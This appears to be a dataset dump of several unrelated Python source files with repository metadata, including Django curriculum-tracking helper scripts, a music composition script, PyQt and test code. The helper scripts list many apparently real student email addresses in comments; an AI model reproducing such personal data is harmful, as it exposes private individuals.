meta.rnPrefixes = [
]
prop = PropMeta("str", "adminSt", "adminSt", 1942, PropCategory.REGULAR)
prop.label = "Administrative State"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = 1
prop.defaultValueStr = "start"
prop._addConstant("start", "start", 1)
prop._addConstant("stop", "stop", 2)
prop._addConstant("suspend", "suspend", 3)
meta.props.add("adminSt", prop)
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "descr", "descr", 5579, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "freq", "freq", 1943, PropCategory.REGULAR)
prop.label = "Bootup Diag Test Frequency"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "one-shot"
prop._addConstant("every10mins", "every-10-mins", 600000)
prop._addConstant("every12hrs", "every-12-hours", 43200000)
prop._addConstant("every1day", "every-1-day", 86400000)
prop._addConstant("every1hr", "every-1-hour", 3600000)
prop._addConstant("every1week", "every-1-week", 604800000)
prop._addConstant("every2hrs", "every-2-hours", 7200000)
prop._addConstant("every30mins", "every-30-mins", 1800000)
prop._addConstant("every4hrs", "every-4-hours", 14400000)
prop._addConstant("every4weeks", "every-4-weeks", 2419200000)
prop._addConstant("every5mins", "every-5-mins", 300000)
prop._addConstant("every8hrs", "every-8-hours", 28800000)
prop._addConstant("one-shot", "once", 0)
meta.props.add("freq", prop)
prop = PropMeta("str", "name", "name", 4991, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "ownerKey", "ownerKey", 15230, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerKey", prop)
prop = PropMeta("str", "ownerTag", "ownerTag", 15231, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerTag", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"rrishike@cisco.com"
] | rrishike@cisco.com |
a8b518462a18be00cb11ef084cc3170c03798e9e | 9e19b20d5a63d6e7693ad85eba37c8d1d1507192 | /Python/441_Arranging Coins.py | 68b8ab9baf05220ed1854c4304608a9507247475 | [] | no_license | Eddie02582/Leetcode | eacbfdfa0075c16ee7b3eb297c116fe42e7c8550 | b5c25f976866eefec33b96c638a4c5e127319e74 | refs/heads/master | 2022-10-22T20:51:06.739926 | 2022-10-17T07:43:38 | 2022-10-17T07:43:38 | 189,950,613 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 893 | py | '''
You have a total of n coins that you want to form in a staircase shape, where every k-th row must have exactly k coins.
Given n, find the total number of full staircase rows that can be formed.
n is a non-negative integer and fits within the range of a 32-bit signed integer.
Example 1:
n = 5
The coins can form the following rows:
?
? ?
? ?
Because the 3rd row is incomplete, we return 2.
Example 2:
n = 8
The coins can form the following rows:
?
? ?
? ? ?
? ?
'''
class Solution(object):
def arrangeCoins(self, n):
total,count,i = 0 ,0,1
while total <= n:
total += i
i += 1
if total <= n:
count += 1
return count
sol = Solution()
assert sol.arrangeCoins(5) == 2
assert sol.arrangeCoins(8) == 3
assert sol.arrangeCoins(1) == 1
| [
"38853252+Eddie02582@users.noreply.github.com"
] | 38853252+Eddie02582@users.noreply.github.com |
8e862dda517f499add536302544e6aafb9fae6e4 | 7ad0808c8e3f77b1de5e9d3148941dc1404d3432 | /modules/core/system/queue_controller.py | e0f42bae7333d641ea4967a8dc9be090500c4148 | [] | no_license | Budabot/Tyrbot | addadfb6d265d371d5bbef1195a41d53736bf5dc | bf04a5180dac129f56b6d2231ab26070d8b6d2cc | refs/heads/master | 2023-08-04T10:44:29.861252 | 2023-07-26T15:02:54 | 2023-07-26T15:02:54 | 120,727,804 | 27 | 38 | null | 2023-08-15T18:43:24 | 2018-02-08T07:40:12 | Python | UTF-8 | Python | false | false | 1,314 | py | from core.command_param_types import Const, Any
from core.decorators import instance, command
@instance()
class QueueController:
def inject(self, registry):
self.bot = registry.get_instance("bot")
self.command_alias_service = registry.get_instance("command_alias_service")
self.command_service = registry.get_instance("command_service")
def start(self):
self.command_alias_service.add_alias("clearqueue", "queue clear")
@command(command="queue", params=[Const("clear")], access_level="moderator",
description="Clear the outgoing message queue")
def queue_clear_cmd(self, request, _):
num_messages = len(request.conn.packet_queue)
request.conn.packet_queue.clear()
return f"Cleared <highlight>{num_messages}</highlight> messages from the outgoing message queue."
@command(command="massmsg", params=[Any("command")], access_level="moderator",
description="Force the reply of the specified command to be sent via non-main bots")
def massmsg_cmd(self, request, command_str):
def reply(msg):
self.bot.send_mass_message(request.sender.char_id, msg, conn=request.conn)
self.command_service.process_command(command_str, request.channel, request.sender.char_id, reply, request.conn)
| [
"email1@jkbff.com"
] | email1@jkbff.com |
093e614f902f69b5827e4236c41809ee21e3d461 | 73a0f661f1423d63e86489d4b2673f0103698aab | /python/oneflow/test/modules/test_global_batch_gather.py | 3653c7d5bb759c2d7bdae6249247d70c87908203 | [
"Apache-2.0"
] | permissive | Oneflow-Inc/oneflow | 4fc3e081e45db0242a465c4330d8bcc8b21ee924 | 0aab78ea24d4b1c784c30c57d33ec69fe5605e4a | refs/heads/master | 2023-08-25T16:58:30.576596 | 2023-08-22T14:15:46 | 2023-08-22T14:15:46 | 81,634,683 | 5,495 | 786 | Apache-2.0 | 2023-09-14T09:44:31 | 2017-02-11T06:09:53 | C++ | UTF-8 | Python | false | false | 2,335 | py | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
import numpy as np
import oneflow as flow
import oneflow.unittest
from oneflow.test_utils.automated_test_util import *
from oneflow.test_utils.automated_test_util.util import broadcast
def _test_batch_gather(test_case, ndim, placement, sbp):
dims = [random(1, 3).to(int).value() * 8 for _ in range(ndim)]
x = random_tensor(ndim, *dims, requires_grad=True)
local_x = flow.tensor(x.pytorch.detach().cpu().numpy(), requires_grad=True)
global_x = x.oneflow.to_global(placement=placement, sbp=sbp)
global_x.retain_grad()
indices_ndim = random(1, ndim + 1).to(int).value()
indices_dims = [dims[i] for i in range(indices_ndim)]
indices_dims[-1] = random(1, dims[indices_ndim - 1]).to(int).value()
indices = np.random.choice(dims[indices_ndim - 1], indices_dims)
indices = broadcast(indices)
local_indices = flow.tensor(indices)
global_indices = local_indices.to_global(
placement=placement, sbp=[flow.sbp.broadcast for _ in range(len(sbp))]
)
global_out = flow.batch_gather(global_x, global_indices)
global_out.sum().backward()
local_out = flow.batch_gather(local_x, local_indices)
local_out.sum().backward()
test_case.assertTrue(
np.allclose(
global_x.grad.detach().cpu().numpy(),
local_x.grad.detach().cpu().numpy(),
atol=1e-5,
rtol=1e-5,
)
)
class TestBatchGather(flow.unittest.TestCase):
@globaltest
def test_batch_gather(test_case):
ndim = 2
for placement in all_placement():
for sbp in all_sbp(placement, max_dim=ndim):
_test_batch_gather(test_case, ndim, placement, sbp)
if __name__ == "__main__":
unittest.main()
| [
"noreply@github.com"
] | Oneflow-Inc.noreply@github.com |
7411091b34332232c549ad28678e225515310812 | 7d90d2ce27c6ee0af74391b09909edbd45fdc2f0 | /renix_py_api/api_gen/ResultView_Autogen.py | 016622ef5e523d60fed961c68f0489c4b254c5cc | [] | no_license | gaoxingyu-hub/54testframework-master-e284 | d7ea0d4a715b65c8652430e963a86b9522a7237a | 57dd2197e7d91b8ad8fb2bd0e3503f10afa08544 | refs/heads/master | 2023-04-30T05:50:41.542402 | 2021-05-28T09:19:37 | 2021-05-28T09:19:37 | 309,922,838 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,180 | py | """
Auto-generated File
Create Time: 2019-12-27 02:33:25
"""
from .ROMEnum_Autogen import *
from renix_py_api.renix_common_api import *
from renix_py_api import rom_manager
from .ROMObject_Autogen import ROMObject
@rom_manager.rom
class ResultView(ROMObject):
def __init__(self, ViewName=None, DataClassName=None, **kwargs):
self._ViewName = ViewName # Result View Name
self._DataClassName = DataClassName # Result class name
properties = kwargs.copy()
if ViewName is not None:
properties['ViewName'] = ViewName
if DataClassName is not None:
properties['DataClassName'] = DataClassName
# call base class function, and it will send message to renix server to create a class.
super(ResultView, self).__init__(**properties)
def delete(self):
"""
call to delete itself
"""
return self._finalize()
def edit(self, ViewName=None, DataClassName=None, **kwargs):
properties = kwargs.copy()
if ViewName is not None:
self._ViewName = ViewName
properties['ViewName'] = ViewName
if DataClassName is not None:
self._DataClassName = DataClassName
properties['DataClassName'] = DataClassName
super(ResultView, self).edit(**properties)
@property
def ViewName(self):
"""
get the value of property _ViewName
"""
if self.force_auto_sync:
self.get('ViewName')
return self._ViewName
@property
def DataClassName(self):
"""
get the value of property _DataClassName
"""
if self.force_auto_sync:
self.get('DataClassName')
return self._DataClassName
@ViewName.setter
def ViewName(self, value):
self._ViewName = value
self.edit(ViewName=value)
@DataClassName.setter
def DataClassName(self, value):
self._DataClassName = value
self.edit(DataClassName=value)
def _set_viewname_with_str(self, value):
self._ViewName = value
def _set_dataclassname_with_str(self, value):
self._DataClassName = value
| [
"gaoxingyu@example.com"
] | gaoxingyu@example.com |
459c9001444fdc3031c5f9eeb2aa1cb81d654248 | 8ec653d0a30a732b838dc32b83fa9c12a47e3fcd | /backend/curriculum_tracking/management/project_wrangle_helpers.py | eec3c126736d55edd30a256c5f528b30be4e554a | [] | no_license | Rokhuda/Tilde | 6cc853629dbdc781bb454908a75a4f87a6dbf2bd | 79fd6911dda531b1893d9c989bef586151b45b15 | refs/heads/develop | 2023-01-06T08:40:58.143424 | 2020-10-06T10:28:45 | 2020-10-06T10:28:45 | 301,546,454 | 0 | 0 | null | 2020-10-06T10:28:46 | 2020-10-05T21:39:52 | null | UTF-8 | Python | false | false | 12,942 | py | """ These helper functions were leveraged heavily in preparing the recruit projects for flavoursome cards.
There were a lot of different messes to be cleaned up
"""
from taggit.models import Tag
import csv
from core.models import Cohort, RecruitCohort, User, UserGroup
from curriculum_tracking.models import (
RecruitProject,
ContentItem,
AgileCard,
CurriculumContentRequirement,
)
javascript = Tag.objects.get_or_create(name="javascript")[0]
python = Tag.objects.get_or_create(name="python")[0]
java = Tag.objects.get_or_create(name="java")[0]
kotlin = Tag.objects.get_or_create(name="kotlin")[0]
swift = Tag.objects.get_or_create(name="swift")[0]
typescript = Tag.objects.get_or_create(name="typescript")[0]
none = Tag.objects.get_or_create(name="none")[0]
def get_project_info(content_item_id, user_id):
user = User.objects.get(pk=user_id)
projects = RecruitProject.objects.filter(
content_item_id=content_item_id, recruit_users__in=[user]
)
groups = UserGroup.objects.filter(users__in=[user])
cohorts = [o.cohort for o in RecruitCohort.objects.filter(user=user)]
content_item = ContentItem.objects.get(pk=content_item_id)
print(f"user = {user}")
print(f"groups = {groups}")
print(f"cohorts = {cohorts}")
print(f"content_item = {content_item}")
print(f"{projects.count()} matching projects:")
for project in projects:
print(f"Project: id={project.id} {project}")
print(f"\trepo: {project.repository.ssh_url}")
try:
print(f"\tcard: id={project.agile_card.id} {project.agile_card}")
except AgileCard.DoesNotExist:
print("\tno card")
print()
def export_projects_without_flavours():
with open("gitignore/projects_needing_flavours.csv", "w") as f:
writer = csv.writer(f)
for project in RecruitProject.objects.all():
if project.flavours.count() == 0:
all_groups = []
for user in project.recruit_users.all():
all_groups.extend(
[
f"group {o.id} {o.name}"
for o in UserGroup.objects.filter(users__in=[user])
]
)
all_groups.extend(
[
f"c {o.id} {o.cohort.label}"
for o in RecruitCohort.objects.filter(user=user)
]
)
writer.writerow(
[
project.id,
str(project),
set(all_groups),
project.repository.ssh_url if project.repository else "",
[o.name for o in project.content_item.available_flavours.all()],
]
)
def assign_flavours_to_cohort(cohort_id, default_flavour):
cohort = Cohort.objects.get(pk=cohort_id)
users = [o.user for o in RecruitCohort.objects.filter(cohort=cohort)]
for user in users:
assign_flavours_to_user(user, default_flavour)
def assign_flavours_to_user(user, default_flavour):
for project in RecruitProject.objects.filter(recruit_users__in=[user]):
if project.flavours.count() > 0:
continue
available_flavours = project.content_item.available_flavours.all()
if default_flavour in available_flavours:
print(f"project: {project.id} {project}")
project.flavours.add(default_flavour)
def assign_flavours_to_user_by_email(email, default_flavour):
user = User.objects.get(email=email)
assign_flavours_to_user(user, default_flavour)
# curriculum_tracking//.py
# from curriculum_tracking.management.project_wragle_helpers import assign_flavours
# for o in l:
# if 'web' in o.cohort_curriculum.name:
# print(o)
# assign_flavours(o.id, javascript)
# if 'data' in o.cohort_curriculum.name:
# print(o)
# assign_flavours(o.id, python)
def remove_flavours(cohort_id):
cohort = Cohort.objects.get(pk=cohort_id)
users = [o.user for o in RecruitCohort.objects.filter(cohort=cohort)]
for user in users:
for project in RecruitProject.objects.filter(recruit_users__in=[user]):
project.flavours.clear()
print(project)
print(project.flavours)
def export_project_flavours(cohort_id):
cohort = Cohort.objects.get(pk=cohort_id)
users = [o.user for o in RecruitCohort.objects.filter(cohort=cohort)]
all_projects = []
for user in users:
all_projects.extend(RecruitProject.objects.filter(recruit_users__in=[user]))
all_projects.sort(
key=lambda project: (
[o.id for o in project.recruit_users.all()],
project.content_item_id,
)
)
with open(f"gitignore/cohort_projects_{cohort_id}_{cohort.label}.csv", "w") as f:
writer = csv.writer(f)
writer.writerow(
[
"project.id",
"content_item",
"repository.full_name",
"project.flavours",
"content_item.available_flavours",
]
)
for project in all_projects:
writer.writerow(
[
project.id,
project.content_item,
project.repository.full_name,
[o.name for o in project.flavours.all()],
[o.name for o in project.content_item.available_flavours.all()],
]
)
def if_one_flavour_available_then_assign(cohort_id=None):
cohort = Cohort.objects.get(pk=cohort_id)
users = [o.user for o in RecruitCohort.objects.filter(cohort=cohort)]
for user in users:
for project in RecruitProject.objects.filter(recruit_users__in=[user]):
if project.flavours.count() > 0:
continue
if project.content_item.available_flavours.count() == 1:
flavour = project.content_item.available_flavours.first()
if flavour != none:
print(f"adding {flavour.name} to {project}")
project.flavours.add(flavour)
def change_project_flavour(project_id, to):
project = RecruitProject.objects.get(pk=project_id)
project.flavours.clear()
project.flavours.add(to)
def export_nosubmit_projects():
with open("gitignore/nosubmit_projects.csv", "w") as f:
writer = csv.writer(f)
writer.writerow(
["project.id", "project.content_item_id", "project.content_item.title"]
)
for project in RecruitProject.objects.filter(
content_item__project_submission_type=ContentItem.NO_SUBMIT
).order_by("content_item_id"):
writer.writerow(
[project.id, project.content_item_id, project.content_item.title]
)
def change_project_content_item_id(from_id, to_id):
print(f"from {ContentItem.objects.get(pk=from_id)}")
print(f"to {ContentItem.objects.get(pk=to_id)}")
for project in RecruitProject.objects.filter(content_item_id=from_id):
print(project.id)
project.content_item_id = to_id
project.save()
print()
def get_project_info(content_item_id, user_id):
user = User.objects.get(pk=user_id)
projects = RecruitProject.objects.filter(
content_item_id=content_item_id, recruit_users__in=[user]
)
if projects.count() < 2:
return
flavours = [
sorted([o.name for o in project.flavours.all()]) for project in projects
]
flavours = [",".join(l) for l in flavours]
if len(set(flavours)) == projects.count():
return
groups = UserGroup.objects.filter(users__in=[user])
cohorts = [o.cohort for o in RecruitCohort.objects.filter(user=user)]
content_item = ContentItem.objects.get(pk=content_item_id)
print(f"user = {user}")
print(f"groups = {groups}")
print(f"cohorts = {cohorts}")
print(f"content_item = {content_item}")
print(f"{projects.count()} matching projects:")
for project in projects:
print(f"Project: id={project.id} {project}")
print(f"\trepo: {project.repository.ssh_url}")
print(f"\tflavours: {[o.name for o in project.flavours.all()]}")
try:
print(f"\tcard: id={project.agile_card.id} {project.agile_card}")
except AgileCard.DoesNotExist:
print("\tno card")
print()
SQL_QUERY_TO_FETCH_POTENTIAL_DUPLICATE_PROJECTS = """
select count(*) ,curriculum_tracking_recruitproject.content_item_id,curriculum_tracking_recruitproject_recruit_users.user_id
into TEMPORARY temp
from curriculum_tracking_recruitproject, curriculum_tracking_recruitproject_recruit_users where curriculum_tracking_recruitproject_recruit_users.recruitproject_id = curriculum_tracking_recruitproject.id group by user_id,content_item_id;
select * from temp where count>1;
"""
def change_content_id(project_id, cid, flavour):
o = RecruitProject.objects.get(pk=project_id)
o.content_item_id = cid
o.save()
o.flavours.add(flavour)
def pproject(id):
proj = RecruitProject.objects.get(pk=id)
print(proj)
print(proj.repository)
def delete_nosubmit_instances():
AgileCard.objects.filter(
content_item__project_submission_type=ContentItem.NO_SUBMIT
).delete()
CurriculumContentRequirement.objects.filter(
content_item__project_submission_type=ContentItem.NO_SUBMIT
).delete()
RecruitProject.objects.filter(
content_item__project_submission_type=ContentItem.NO_SUBMIT
).delete()
# assign_flavours_to_topic_progress(path="topics/angular-testing-cucumber" flavour="typescript,angular")
# assign_flavours_to_topic_progress(path="topics/angular-mocking" flavour="typescript,angular")
# assign_flavours_to_topic_progress(path="topics/ionic/introduction-to-ionic" flavour="typescript,angular,ionic")
# assign_flavours_to_topic_progress(path="topics/ionic/ionic-tools-and-patterns" flavour="typescript,angular,ionic")
# assign_flavours_to_topic_progress(path="topics/ionic/progressive-web-apps" flavour="typescript,angular,ionic")
# TODO!!!
# python manage.py delete_and_recreate_user_cards thanyani.tshikonwani@umuzi.org
# python manage.py delete_and_recreate_user_cards thotsana.mabotsa@umuzi.org
# python manage.py delete_and_recreate_user_cards ngwako.moshobane@umuzi.org
# unflavoured_progress = [<RecruitProject: Animals Part 2. Adding Tests - thanyani.tshikonwani@umuzi.org>]
# unflavoured_progress = [<RecruitProject: Animals Part 2. Adding Tests - thotsana.mabotsa@umuzi.org>]
# content_item_id = 225
# user_email = "thotsana.mabotsa@umuzi.org"
# user = User.objects.get(email=user_email)
# project = RecruitProject.objects.get(recruit_users__in=[user],content_item_id=content_item_id)
# project.repository.full_name
# # misc web devs
# # data scientists
# C19s -
# anda.pika@umuzi.org
# khanya.nelani@umuzi.org
# nkosinathi.siyeni@umuzi.org
# nuraan.barnes@umuzi.org
# thembela.selani@umuzi.org
# yanga.kanzi@umuzi.org
# C21s -
# andisiwe.nkwana@umuzi.org
# anttonert.maphosa@umuzi.org
# simon.zikhali@umuzi.org
def get_all_recruits_in_cohorts_with_matching_curriculum(curriculum_id):
ds_users = []
for cohort in Cohort.objects.filter(cohort_curriculum_id=2, active=True):
if cohort.cohort_number == 22:
continue
for o in RecruitCohort.objects.filter(cohort=cohort, user__active=True):
ds_users.append(o.user)
return ds_users
# ds_users = get_all_recruits_in_cohorts_with_matching_curriculum(2)
# for user in ds_users:
# print(user.email)
# web_users = get_all_recruits_in_cohorts_with_matching_curriculum(3)
# for user in web_users:
# print(user.email)
# d_eng_users = get_all_recruits_in_cohorts_with_matching_curriculum(4)
# for user in d_eng_users:
# print(user.email)
# DS
# ntokozo.mfene @ umuzi.org
# masai.mahapa @ umuzi.org
# phethehile.molefe @ umuzi.org
# puleng.moru @ umuzi.org
# boitshepo.masemola @ umuzi.org
# bokang.kama @ umuzi.org
# johan.khanye @ umuzi.org
# olebogeng.seribe @ umuzi.org
# phathu.ramakhanya @ umuzi.org
# singita.ngobeni @ umuzi.org
# themba.mbulwana @ umuzi.org
# wandile.nxumalo @ umuzi.org
# kevin.mntambo @ umuzi.org
# vhambelani.maelekano @ umuzi.org
# andy.nkumane @ umuzi.org
# milpontia.ngwenya @ umuzi.org
# dimpho.mashile @ umuzi.org
# hlobisile.mlebuka @ umuzi.org
# allen.mkandla @ umuzi.org
# joy.masemola @ umuzi.org
# mahnatse.choung @ umuzi.org
# mpho.khotleng @ umuzi.org
# shalom.mothapo @ umuzi.org
# sibusiso.fikizolo @ umuzi.org
# siphiwe.mahlangu @ umuzi.org
# mayika.thabo @ umuzi.org
# tshepo.rampai @ umuzi.org
# faith.mabule @ umuzi.org
# yanga.lusiti @ umuzi.org
# eric.maza @ umuzi.org
# khomotso.talane @ umuzi.org
# rethabile.thulo @ umuzi.org
# vuyile.magwaza @ umuzi.org
| [
"sheena.oconnell@gmail.com"
] | sheena.oconnell@gmail.com |
f11af8e0e76f04055392f05a6934c6acb8dbaa2d | 1c29f2609b0cb9a72972fb94e630ed8335b5e4e4 | /scripts/CreateAndCleanupMarkerGraph.py | 8dc351afb0b541ceef2db839c9f6120ead0bba6c | [
"MIT",
"Zlib",
"LicenseRef-scancode-public-domain"
] | permissive | tw7649116/shasta | 4bef2b878bca0adcb003902c619ab3f388b13498 | 8612d46fd3de5ed51d19f05c4d811b5736d516ad | refs/heads/master | 2020-04-28T02:44:06.973416 | 2019-03-06T19:35:49 | 2019-03-06T19:35:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,145 | py | #!/usr/bin/python3
import shasta
import GetConfig
import sys
# Read the config file.
config = GetConfig.getConfig()
# Initialize the assembler and access what we need.
a = shasta.Assembler()
a.accessReadsReadOnly()
a.accessKmers()
a.accessMarkers()
a.accessAlignmentData()
a.accessReadGraph()
a.accessChimericReadsFlags()
# Create vertices of the marker graph.
a.createMarkerGraphVertices(
maxMarkerFrequency = int(config['Align']['maxMarkerFrequency']),
maxSkip = int(config['Align']['maxSkip']),
minCoverage = int(config['MarkerGraph']['minCoverage']),
maxCoverage = int(config['MarkerGraph']['maxCoverage']))
# Create edges of the marker graph.
a.createMarkerGraphEdges()
# Approximate transitive reduction.
a.flagMarkerGraphWeakEdges(
lowCoverageThreshold = int(config['MarkerGraph']['lowCoverageThreshold']),
highCoverageThreshold = int(config['MarkerGraph']['highCoverageThreshold']),
maxDistance = int(config['MarkerGraph']['maxDistance']),
)
# Prune the strong subgraph of the marker graph.
a.pruneMarkerGraphStrongSubgraph(
iterationCount = int(config['MarkerGraph']['pruneIterationCount']))
| [
"paoloczi@users.noreply.github.com"
] | paoloczi@users.noreply.github.com |
1c934fe5e03fbd7d00b58d1b16e4a2d2a0a5c435 | aca253ff1a97c96a1a0a9a5802aa623789662bb1 | /p030/dialog_demo.py | e568b7f233a493e3aef167358b74b2a0a0b09abf | [] | no_license | KD-huhu/PyQt5 | a6128a34b93f6e2da7216d5818f66dc9614216bc | 1c33a6549c2fcf663168256553d8c24e25d9a69c | refs/heads/master | 2022-07-03T07:37:29.837547 | 2020-05-17T14:54:39 | 2020-05-17T14:54:39 | 261,768,854 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,136 | py | import sys
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
class QDialogDemo(QMainWindow):
def __init__(self):
super(QDialogDemo,self).__init__()
self.initUI()
def initUI(self):
self.setWindowTitle('QDialog案例')
self.resize(300,200)
self.button = QPushButton(self)
self.button.setText('弹出对话框')
self.button.move(50,50)
self.button.clicked.connect(self.showDialog)
def showDialog(self):
dialog = QDialog() # 创建对话框对象
button = QPushButton('确定',dialog) # 添加按钮控件
button.clicked.connect(dialog.close)
button.move(50,50)
dialog.setWindowTitle('对话框') # 对话框基础设置和主窗口相同
dialog.setWindowModality(Qt.ApplicationModal) # 在对话框中,主窗口的控件不可用
dialog.exec()
if __name__ == '__main__':
app = QApplication(sys.argv)
main = QDialogDemo()
main.show()
sys.exit(app.exec_())
| [
"noreply@github.com"
] | KD-huhu.noreply@github.com |
13507a4833cf69a71115ace06a6eff6d13129eb8 | a054b81a3abfd612ee89ad4b6a536fa6ccf63da1 | /GUERRERO_Paper/timespans/Section_B.py | 2bfa308a1c16de18c907f2a56c86cd5695b3f837 | [] | no_license | GregoryREvans/GUERRERO_Analysis_Paper | 60ea5824980f803217a8080ba5a1e8dff8f11a12 | 0fd45edc36498b4e2c8a47617fb797493ef25af0 | refs/heads/master | 2020-05-19T10:22:45.889642 | 2019-05-05T03:05:46 | 2019-05-05T03:05:46 | 184,969,756 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 150,578 | py | import abjad
import itertools
import os
import pathlib
import time
import abjadext.rmakers
from MusicMaker import MusicMaker
from AttachmentHandler import AttachmentHandler
from random import random
from random import seed
from evans.general_tools.random_walk import randomWalk
from evans.general_tools.rotate import rotate
from evans.general_tools.mirror import mirror
from evans.abjad_functions.talea_timespan.timespan_functions import make_showable_list as make_showable_list
print('Interpreting file ...')
# Define the time signatures we would like to apply against the timespan structure.
time_signatures = [
abjad.TimeSignature(pair) for pair in [
(4, 4), (4, 4), (4, 4), (4, 4), (4, 4),
(4, 4), (4, 4), (4, 4), (4, 4), (4, 4),
(4, 4), (4, 4), (4, 4),
# (4, 4), (4, 4), (4, 4), (4, 4), (4, 4), (4, 4), (4, 4),
# (4, 4), (4, 4), (4, 4), (4, 4), (7, 8),
]
]
bounds = abjad.mathtools.cumulative_sums([_.duration for _ in time_signatures])
#Define Pitch Material
def cyc(lst):
count = 0
while True:
yield lst[count%len(lst)]
count += 1
def grouper(lst1, lst2):
def cyc(lst):
c = 0
while True:
yield lst[c%len(lst)]
c += 1
lst1 = cyc(lst1)
return [next(lst1) if i == 1 else [next(lst1) for _ in range(i)] for i in lst2]
def reduceMod(list_length, rw):
return [(x % list_length) for x in rw]
# -3 at bottom of chord for completion
sopranino_chord = [27, ]
soprano_1_chord = [[13.25, 16, 26.25, ], 22,]
soprano_2_chord = [[13, 14.75, 26.25, ], 16,] #maybe it's 13.25?
soprano_3_chord = [[12.75, 15.5, 26, ], 13,]
alto_1_chord = [[12.5, 19, 27.75, 34, ], 20,]
alto_2_chord = [[12.5, 15.25, 25.5, ], 12,]
alto_3_chord = [[1.75, 13.5, 22.25, 27, 30, ], 1,]
alto_4_chord = [[12.5, 15.25, 25.5, ], 20,]
alto_5_chord = [[1.75, 13.5, 22.25, 27, 30, ], 12,]
alto_6_chord = [[12.5, 19, 27.75, 34, ], 1,]
tenor_1_chord = [[6, 17.5, ], 17,]
tenor_2_chord = [[6, 17.5, 25.5, 30, ], 6,]
tenor_3_chord = [[6, 17.5, 25.5, 30.75, ], -1]
tenor_4_chord = [[6, 17.5, ], 17,]
tenor_5_chord = [[6, 17.5, 25.5, 30.75, ], 6,]
baritone_1_chord = [[13.25, 27.5, 33.75, ], 13,]
baritone_2_chord = [[4, 16.5, 23.5, ], 6,]
baritone_3_chord = [[7.75, 17.75, 25.5, 34, ], 4,]
bass_1_chord = [11, ]
bass_2_chord = [9, ]
contrabass_chord = [-2, 2, 7, -2, 2, 7, 2, -2]
def reduceMod(x, rw):
return [(y % x) for y in rw]
walk_list = []
for x in range(-1, 30):
walk_list.append(x)
walk_list.append(x + 0.5)
mirrored_walk_list = mirror(walk_list, sequential_duplicates=False)
sopranino_walk_chord = rotate(mirrored_walk_list, 56)
sopranino_random_walk_notes = [x for x in randomWalk(
random_seed=1,
length=1000,
step_list=[1],
mapped_list=sopranino_walk_chord
)
]
soprano_1_walk_chord = rotate(mirrored_walk_list, 46)
soprano_1_random_walk_notes = [x for x in randomWalk(
random_seed=2,
length=1000,
step_list=[1],
mapped_list=soprano_1_walk_chord
)
]
soprano_2_walk_chord = rotate(mirrored_walk_list, 34)
soprano_2_random_walk_notes = [x for x in randomWalk(
random_seed=3,
length=1000,
step_list=[1],
mapped_list=soprano_2_walk_chord
)
]
soprano_3_walk_chord = rotate(mirrored_walk_list, 28)
soprano_3_random_walk_notes = [x for x in randomWalk(
random_seed=4,
length=1000,
step_list=[1],
mapped_list=soprano_3_walk_chord
)
]
alto_1_walk_chord = rotate(mirrored_walk_list, 42)
alto_1_random_walk_notes = [x for x in randomWalk(
random_seed=5,
length=1000,
step_list=[1],
mapped_list=alto_1_walk_chord
)
]
alto_2_walk_chord = rotate(mirrored_walk_list, 26)
alto_2_random_walk_notes = [x for x in randomWalk(
random_seed=6,
length=1000,
step_list=[1],
mapped_list=alto_2_walk_chord
)
]
alto_3_walk_chord = rotate(mirrored_walk_list, 4)
alto_3_random_walk_notes = [x for x in randomWalk(
random_seed=7,
length=1000,
step_list=[1],
